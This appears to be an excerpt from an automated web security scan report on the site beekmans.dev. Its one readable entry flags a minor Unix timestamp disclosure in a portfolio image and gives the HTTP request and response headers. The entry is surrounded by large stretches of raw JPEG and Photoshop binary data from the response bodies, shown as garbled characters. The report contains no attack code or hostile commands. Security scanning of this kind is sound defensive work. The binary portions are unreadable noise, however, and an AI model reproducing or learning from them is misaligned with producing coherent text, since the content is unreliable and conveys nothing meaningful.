¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          228083377
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        44. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          242265558, which evaluates to: 1977-09-05 01:59:18

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
